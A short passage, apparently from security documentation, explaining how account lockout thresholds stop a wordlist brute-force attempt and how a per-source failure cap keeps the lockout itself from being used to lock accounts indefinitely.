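```

With the default thresholds the correct password on the sixth attempt is rejected with `locked`, exactly as a wrong one would be; with an effectively unlimited failure count the same wordlist succeeds. The per-source cap is also what bounds the collateral damage of the lock itself: without it, anyone who knows a username can keep that account locked indefinitely from a single client.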